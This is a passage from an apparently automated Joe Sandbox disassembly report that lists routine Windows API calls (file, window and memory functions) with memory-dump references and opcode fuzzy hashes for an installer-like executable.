                                                                                  • Opcode Fuzzy Hash: 9dda91361662054eb01da6890b4592a34015e15ce18affdee5ac8f1e4e79cee9
                                                                                  • Instruction Fuzzy Hash: FA01D675A04204ABCB05EB799C4149EB7ECEB4971575146BBFC18E3382EA785E04895C
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID: ,Zz
                                                                                  • API String ID: 1263568516-1049774954
                                                                                  • Opcode ID: 5df8a043f9a2a9cbae4a2f74b72f79f1465c0216c5c01d587d4b0d050a195def
                                                                                  • Instruction ID: e1ed734a1c3a058ee0023f39ac6d7a90637d8326831343bb930abb00da4444b8
                                                                                  • Opcode Fuzzy Hash: 5df8a043f9a2a9cbae4a2f74b72f79f1465c0216c5c01d587d4b0d050a195def
                                                                                  • Instruction Fuzzy Hash: 9A01FC766052148FC310AE29DCC0E1A77A8D785378F15453EDA89673A1D37A6C0187D9
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00450833), ref: 0045080D
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00450833), ref: 00450815
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: 9d2c7f268bf6982f8ff0902aeee861741f1bc57fcdce572af928d56f267896ec
                                                                                  • Instruction ID: 9ae0cf88698875d74e61299ea251dd1f78966ad9c0527c9a68659f67d4d19dd6
                                                                                  • Opcode Fuzzy Hash: 9d2c7f268bf6982f8ff0902aeee861741f1bc57fcdce572af928d56f267896ec
                                                                                  • Instruction Fuzzy Hash: 55F02875A04204ABDB10EFB59C4199EB7E8DB48315B5049B7FC04E3282E6395E048A9C
                                                                                  APIs
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004231C1
                                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 004231EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorLoad
                                                                                  • String ID:
                                                                                  • API String ID: 3238433803-0
                                                                                  • Opcode ID: d4234bfd78f5adf6a5d3de7a1c0f619011c076f3d5bc3b1bb25a19f59f7e4d11
                                                                                  • Instruction ID: d58f8ce375724b661843ba2b23495a11fbf4eff19172bbcda07db4bbef3632c6
                                                                                  • Opcode Fuzzy Hash: d4234bfd78f5adf6a5d3de7a1c0f619011c076f3d5bc3b1bb25a19f59f7e4d11
                                                                                  • Instruction Fuzzy Hash: FAF0EC21B4011457E6105D3E6CC093A7268DB81735B61033BFA3BD72D1CA2F9D51826D
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E162
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E1AC,?,00000000,0042E1CA,?,00008000), ref: 0042E191
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                  • String ID:
                                                                                  • API String ID: 2987862817-0
                                                                                  • Opcode ID: 0c4d76aa85af50ba3fccf074c0c08e18675401e00bcbb549d530719601baa393
                                                                                  • Instruction ID: 188a5a1215394e3a5e5b6b3db99c0d968cab52b8da4c45c56b4289770657f3f0
                                                                                  • Opcode Fuzzy Hash: 0c4d76aa85af50ba3fccf074c0c08e18675401e00bcbb549d530719601baa393
                                                                                  • Instruction Fuzzy Hash: AAF08270714744BEDF129F779C5282BBBECEB0DB1079249B6F800E2692E57C5820C968
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,0044F514,?,00000000,?,0048B368,00000000,0048B3C5), ref: 0044F4D7
                                                                                  • GetLastError.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,0044F514,?,00000000,?,0048B368,00000000,0048B3C5), ref: 0044F4E6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 1948546556-0
                                                                                  • Opcode ID: 04943047f8366641a077a23db8f92f6c2efc9acee1c1bdc07d1de29902e96714
                                                                                  • Instruction ID: 4d1a3651c66762b546707e7603ae2fd260cebf87bacac987061f3ed0efd92732
                                                                                  • Opcode Fuzzy Hash: 04943047f8366641a077a23db8f92f6c2efc9acee1c1bdc07d1de29902e96714
                                                                                  • Instruction Fuzzy Hash: 8AE092622041506AEB20969E98C4F6B67DCCBD9324F14407BF508CB202CA68DC088779
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0044F55F
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 0044F567
                                                                                    • Part of subcall function 0044F4AC: GetLastError.KERNEL32(0044F1B8,0044F2DD,?,00000000,?,0048B32E,00000001,00000000,00000002,00000000,0048B497,?,?,00000005,00000000,0048B4CB), ref: 0044F4AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: 8ce8b2311ba8f2da9958f2e9b15d091b3d2c6b54562e03e4a3fde3aebceb3953
                                                                                  • Instruction ID: 8d36c5ab053789a161cbc1aed2e27b5676682088ee405e7db3d698a23d309801
                                                                                  • Opcode Fuzzy Hash: 8ce8b2311ba8f2da9958f2e9b15d091b3d2c6b54562e03e4a3fde3aebceb3953
                                                                                  • Instruction Fuzzy Hash: 21E092767046006BE710D95DE881A9B27DCDFC53A4F04413AB658DF191D675D8048769
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(A1056AFF,00000000,?,00000001,0048BFF2,00000001,0044FC33,?,00000000,00000000,00000001,00000000,00000002,00000000,004764AA), ref: 0044F38F
                                                                                  • GetLastError.KERNEL32(A1056AFF,00000000,?,00000001,0048BFF2,00000001,0044FC33,?,00000000,00000000,00000001,00000000,00000002,00000000,004764AA), ref: 0044F39B
                                                                                    • Part of subcall function 0044F4AC: GetLastError.KERNEL32(0044F1B8,0044F2DD,?,00000000,?,0048B32E,00000001,00000000,00000002,00000000,0048B497,?,?,00000005,00000000,0048B4CB), ref: 0044F4AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: e528862d6fce73b0ef0b0894e3b757dff9ef9e7ff2dbf6c6405bd92600b36dd5
                                                                                  • Instruction ID: ca602b0879629286a98f8e92f5dbe0885c2b71a95a079d4275d0a7af9cb254e8
                                                                                  • Opcode Fuzzy Hash: e528862d6fce73b0ef0b0894e3b757dff9ef9e7ff2dbf6c6405bd92600b36dd5
                                                                                  • Instruction Fuzzy Hash: 8CE04F71600610DFEB20EEB588C1B6376E8DF48364F0486BAEA14CF2D6D675CC008B64
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468667,00000000), ref: 0044F596
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468667,00000000), ref: 0044F59E
                                                                                    • Part of subcall function 0044F4AC: GetLastError.KERNEL32(0044F1B8,0044F2DD,?,00000000,?,0048B32E,00000001,00000000,00000002,00000000,0048B497,?,?,00000005,00000000,0048B4CB), ref: 0044F4AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: 3dcab196a5292442044a5903190d8358f3eeaebe41dd6e5a1d5c8b508be75272
                                                                                  • Instruction ID: add6bf56a2b4bafbd39d18e1f5598bb9eba7bfe7d51d59d3ea086008ca8a62e0
                                                                                  • Opcode Fuzzy Hash: 3dcab196a5292442044a5903190d8358f3eeaebe41dd6e5a1d5c8b508be75272
                                                                                  • Instruction Fuzzy Hash: 11E012B1715200AFFF10EE7689C5B3722D8DB84314F10843AB544CF182D674CC048B29
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(?,00000000,00458F8F,?,00000000,00000002,00000002), ref: 00458F5B
                                                                                    • Part of subcall function 0044F5D0: WriteFile.KERNEL32(?,?,00000000,0044F802,00000000,00000000,?,?,?,0044F802,00000000,00451D99,?,0048BF15,00000000,00451E3A), ref: 0044F5E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1012034594-0
                                                                                  • Opcode ID: d4b8b4cb1fea12e9e949d57152ef59f199c0bc2822774dbf7f4b125bde65c59e
                                                                                  • Instruction ID: 02007c17e94098c3eb61c7ede296e47d4de495128f01c5454d3affa7406a6146
                                                                                  • Opcode Fuzzy Hash: d4b8b4cb1fea12e9e949d57152ef59f199c0bc2822774dbf7f4b125bde65c59e
                                                                                  • Instruction Fuzzy Hash: C5519335A002589BDB24DF25DC41ADAB3B5EB48304F0085EAED4CE7792DB74AEC98F54
                                                                                  APIs
                                                                                  • SendNotifyMessageA.USER32(00010482,00000496,00002711,00000000), ref: 004739C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageNotifySend
                                                                                  • String ID:
                                                                                  • API String ID: 3556456075-0
                                                                                  • Opcode ID: 3bee2ff62c655c9fa9e2ec765b6082f3423417509ee67433e2807da879ac6211
                                                                                  • Instruction ID: 38765318b9ee7c54b21ab49386a5d24e6debf15534a353ba00b4fc7eedbaa329
                                                                                  • Opcode Fuzzy Hash: 3bee2ff62c655c9fa9e2ec765b6082f3423417509ee67433e2807da879ac6211
                                                                                  • Instruction Fuzzy Hash: 6B4130B17001049BC710FF6BDC8568E7795AB44306B60893BA5089F3A6CB78EE46DB5E
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408696), ref: 0040857F
                                                                                    • Part of subcall function 00406D70: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D8D
                                                                                    • Part of subcall function 004084EC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048E4C0,00000001,?,004085B7,?,00000000,00408696), ref: 0040850A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1658689577-0
                                                                                  • Opcode ID: e29af522ba0988aeb60e122e3c9bc24491b19899e174f85bbca7b8a20f7edcd1
                                                                                  • Instruction ID: 52b812c0c0be311f3a291c346bb3395997d73e3b56f3d47de8302be212eca558
                                                                                  • Opcode Fuzzy Hash: e29af522ba0988aeb60e122e3c9bc24491b19899e174f85bbca7b8a20f7edcd1
                                                                                  • Instruction Fuzzy Hash: 02314171E00109ABCB00EF95C8819EEB779FF84314F118977E815BB285E739AE058B98
                                                                                  APIs
                                                                                  • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoScroll
                                                                                  • String ID:
                                                                                  • API String ID: 629608716-0
                                                                                  • Opcode ID: 7f6b84a42733a01d6f73f7849b70d5566b358b53d367a0786df38fa25cde3038
                                                                                  • Instruction ID: dcf06629550145b58ef34ee434199231c225e6a6bff4ee8aec484791df4c3329
                                                                                  • Opcode Fuzzy Hash: 7f6b84a42733a01d6f73f7849b70d5566b358b53d367a0786df38fa25cde3038
                                                                                  • Instruction Fuzzy Hash: 242130B1A087456FD340DF29D440697BBE4BB48354F044A3EA498C3341D778E99ACBD6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                  • Instruction ID: 731552fab7af98befb1e58d48d4bf360f11e9edacbcbb036bbf76dc7dee597ce
                                                                                  • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                  • Instruction Fuzzy Hash: 71F06D34105109EFAF0CCF58D0628AF77A1EB48301B20806FE60B8B390C638BE20DE5A
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 068fad39c47e62cef911d24e195553cb9d2b4de24d2f572771caf9a233b8a50b
                                                                                  • Instruction ID: 6411a4de6a8bf006bd00fe5c1a4dd6a5cdd7824d5452099868ac7a3c138bf991
                                                                                  • Opcode Fuzzy Hash: 068fad39c47e62cef911d24e195553cb9d2b4de24d2f572771caf9a233b8a50b
                                                                                  • Instruction Fuzzy Hash: 87F02BB2200510AFDB84CF9CD8C0F9773ECEB0C210B0485A5FA08CF20AD261EC108BB1
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00414967
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                  • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                  • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                  • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                  APIs
                                                                                    • Part of subcall function 0042CA74: CharPrevA.USER32(?,00000000,?,00000001,?,?,0042CBA2,00000000,0042CBC8,?,00000001,?,?,00000000,?,0042CC1A), ref: 0042CA9C
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBC8,?,00000001,?,?,00000000,?,0042CC1A,00000000,004509F1,00000000,00450A12,?,00000000), ref: 0042CBAB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesCharFilePrev
                                                                                  • String ID:
                                                                                  • API String ID: 4082512850-0
                                                                                  • Opcode ID: cae6e41c1385fecdcb92da7b1c8d0c19fa02be41cd870a340ce359dc3f11e965
                                                                                  • Instruction ID: 3d0c7c45eeb55a361d6176191dd111e594ff49ac731d29224bd85272e3d30c06
                                                                                  • Opcode Fuzzy Hash: cae6e41c1385fecdcb92da7b1c8d0c19fa02be41cd870a340ce359dc3f11e965
                                                                                  • Instruction Fuzzy Hash: 01E0E571300704BFD701EA62AC83E1EBBACDB85700B9144B6B400E3191D5786F008428
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044F36C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: d6a9d365d000a77edd178b8fed87e0b115bd42997c3f18329dade4c1f56b373a
                                                                                  • Instruction ID: 1ef1dbfa766a32718446d870086df344892f22054ef340e0fe49e327237dcab1
                                                                                  • Opcode Fuzzy Hash: d6a9d365d000a77edd178b8fed87e0b115bd42997c3f18329dade4c1f56b373a
                                                                                  • Instruction Fuzzy Hash: 4CE012B67451183ED380EEAC7C41FAB77DC9709724F009436F998D7281D5619D119BA8
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,00000000,0044F802,00000000,00000000,?,?,?,0044F802,00000000,00451D99,?,0048BF15,00000000,00451E3A), ref: 0044F5E7
                                                                                    • Part of subcall function 0044F4AC: GetLastError.KERNEL32(0044F1B8,0044F2DD,?,00000000,?,0048B32E,00000001,00000000,00000002,00000000,0048B497,?,?,00000005,00000000,0048B4CB), ref: 0044F4AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442123175-0
                                                                                  • Opcode ID: 23f1ae30221f1d5191fdb05c0ea0f8edc0141bd9ce7d565c87ee4901e9a20f8b
                                                                                  • Instruction ID: 42197af36f17d329eb70ac8052d38c03877b614c7f8d8dcebdf9268f59299e38
                                                                                  • Opcode Fuzzy Hash: 23f1ae30221f1d5191fdb05c0ea0f8edc0141bd9ce7d565c87ee4901e9a20f8b
                                                                                  • Instruction Fuzzy Hash: 18E01276305110ABEB10E65ED980F5B67DCDFC5364F10407BB908DB215D664EC098775
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004511C7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E5F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 8d80b94124e33b23749ce4a3090c31d4ff4f77520c29b7e8cd0981b80edcbc08
                                                                                  • Instruction ID: d9eebd954fd390c9e26f27a00b1c0c185f1e5f8be5e7a5c5bf20a1d32a860830
                                                                                  • Opcode Fuzzy Hash: 8d80b94124e33b23749ce4a3090c31d4ff4f77520c29b7e8cd0981b80edcbc08
                                                                                  • Instruction Fuzzy Hash: A4E020713943213AF22510A65C47B7B130D4781704F5480363B10DF3E2EDEED946016E
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000000,004235F4,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84), ref: 0040630D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
